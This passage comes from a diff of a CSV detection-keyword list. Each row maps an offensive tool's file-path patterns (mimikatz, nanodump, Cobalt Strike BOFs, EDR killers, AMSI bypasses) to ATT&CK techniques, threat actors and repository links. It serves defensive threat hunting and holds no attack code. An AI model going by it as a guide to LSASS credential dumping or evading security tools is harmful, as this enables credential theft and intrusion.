Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" -"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\local_admins.csv*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\LocalPrivEsc\*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*\LogonScreen.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*\lsass.DMP","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*\lsass.dmp*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*\lsass.dmp*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\LSASSProtectionBypass\*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*\lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\m3-gen.py*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z" "*\MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" +"*\MachineAccountQuota.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\macoffe.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - 
T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\malseclogon.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*\MalStuff.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*\malware_runner.py*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation 
tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\manspider_*.log*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*\masky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\master\GPSCoordinates\*","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\Mayhem.psm1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\mem_dll.pdb*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","251","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" -"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\met_inject.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\mhydeath64*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*\mimi32.exe*","offensive_tool_keyword","mimikatz","Mimikatz 
keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*\mimi64.exe*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*\Mockingjay_BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" "*\modifiableautorun.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" -"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*\monkey.exe *","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","0","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey32.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\monkey64.exe*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*\ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that 
helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\Mshikaki.cpp*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","0","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" -"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\msi_search.c*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*\msi_search.exe*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.x64.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msi_search.x86.o*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","0","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z"
+"*\msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\MSOL\DomainCompanyInfo.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z"
+"*\mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","0","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
 "*\nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*\nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\net*\ftpagent.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z"
-"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z"
+"*\netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\netexec.yml*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\NetExec-main\*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*\NetLoader.exe*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
 "*\NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*\NimBlackout*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
